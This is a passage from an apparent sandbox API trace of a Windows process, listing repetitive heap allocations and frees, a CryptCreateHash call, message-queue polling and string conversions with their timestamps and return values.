lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0185.828] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0185.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0185.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0185.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0185.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.902] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0185.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0185.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: 